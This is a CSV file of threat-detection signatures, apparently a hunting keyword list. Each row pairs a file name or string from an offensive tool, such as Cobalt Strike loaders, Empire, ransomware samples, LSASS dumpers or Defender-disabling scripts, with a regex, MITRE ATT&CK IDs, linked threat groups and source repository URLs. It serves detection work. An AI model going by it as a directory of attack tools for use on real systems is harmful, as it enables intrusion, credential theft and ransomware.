"*EncodeShellcode(*",".{0,1000}EncodeShellcode\(.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","43146"
"*Encryfer-X Ransomware*",".{0,1000}Encryfer\-X\sRansomware.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","43147"
"*encrypt.py *.bin -p * -o *.enc*",".{0,1000}encrypt\.py\s.{0,1000}\.bin\s\-p\s.{0,1000}\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","43148"
"*encrypt/encryptFile.go*",".{0,1000}encrypt\/encryptFile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","43149"
"*encrypt/encryptUrl.go*",".{0,1000}encrypt\/encryptUrl\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","43150"
"*Encrypt-Bytes*",".{0,1000}Encrypt\-Bytes.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43151"
"*encrypted LSASS dump*",".{0,1000}encrypted\sLSASS\sdump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","43152"
"*encrypted_payload*",".{0,1000}encrypted_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43153"
"*encrypted_sleep(ms:*",".{0,1000}encrypted_sleep\(ms\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","43154"
"*EncryptedPfx.py*",".{0,1000}EncryptedPfx\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","43155"
"*EncryptedZIP.csproj*",".{0,1000}EncryptedZIP\.csproj.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43156"
"*EncryptedZIP.exe*",".{0,1000}EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43157"
"*encrypthub_asseq2QSsxzc*",".{0,1000}encrypthub_asseq2QSsxzc.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","43158"
"*Encryption.config values are encrypted with DPAPI, decrypting*",".{0,1000}Encryption\.config\svalues\sare\sencrypted\swith\sDPAPI,\sdecrypting.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","43159"
"*encryptor -f *.exe -o *.enc*",".{0,1000}encryptor\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","43160"
"*EncryptShellcode(*",".{0,1000}EncryptShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","43161"
"*Encypor-X-Decryptor*","NA","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","43162"
"*endpoint_takeover.exe*",".{0,1000}endpoint_takeover\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","43163"
"*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}Endpoint\-EE15B860\-9EEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","43164"
"*endswith('.dedsec')*",".{0,1000}endswith\(\'\.dedsec\'\).{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","43165"
"*ENDTHISFILETRANSMISSIONEGRESSASSESS*",".{0,1000}ENDTHISFILETRANSMISSIONEGRESSASSESS.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43166"
"*ENDTHISFILETRANSMISSIONEGRESSASSESS*",".{0,1000}ENDTHISFILETRANSMISSIONEGRESSASSESS.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43167"
"*Enelg52/KittyStager*",".{0,1000}Enelg52\/KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","43168"
"*Engineer_super.exe*",".{0,1000}Engineer_super\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","43169"
"*engineseller/localtonet*",".{0,1000}engineseller\/localtonet.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","43170"
"*engjibo/NetUser*",".{0,1000}engjibo\/NetUser.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","43171"
"*enigma_fileless_uac_bypass*",".{0,1000}enigma_fileless_uac_bypass.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","43172"
"*enjoiz/Privesc*",".{0,1000}enjoiz\/Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","43173"
"*enkomio/AlanFramework*",".{0,1000}enkomio\/AlanFramework.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","43174"
"*enpass2john.py*",".{0,1000}enpass2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43175"
"*enpass5tojohn.py*",".{0,1000}enpass5tojohn\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43176"
"*Enter the Direct Link of malware : *",".{0,1000}Enter\sthe\sDirect\sLink\sof\smalware\s\:\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","43177"
"*Enter your loclx authtoken:*",".{0,1000}Enter\syour\sloclx\sauthtoken\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","43178"
"*Enter-SMBSession -ComputerName *",".{0,1000}Enter\-SMBSession\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","43179"
"*Enter-SMBSession* -PipeName * -ServiceName *",".{0,1000}Enter\-SMBSession.{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","43180"
"*Enter-WmiShell *",".{0,1000}Enter\-WmiShell\s.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","43181"
"*Enter-WmiShell.ps1*",".{0,1000}Enter\-WmiShell\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","43182"
"*--entrypoint Dinjector*",".{0,1000}\-\-entrypoint\sDinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","43183"
"*enum_ad_service_principal_names *",".{0,1000}enum_ad_service_principal_names\s.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","43184"
"*enum_artifacts_list.txt*",".{0,1000}enum_artifacts_list\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43185"
"*enum_av_excluded.rb*",".{0,1000}enum_av_excluded\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43186"
"*enum_avproducts.py*",".{0,1000}enum_avproducts\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","43187"
"*enum_brocade.md*",".{0,1000}enum_brocade\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - 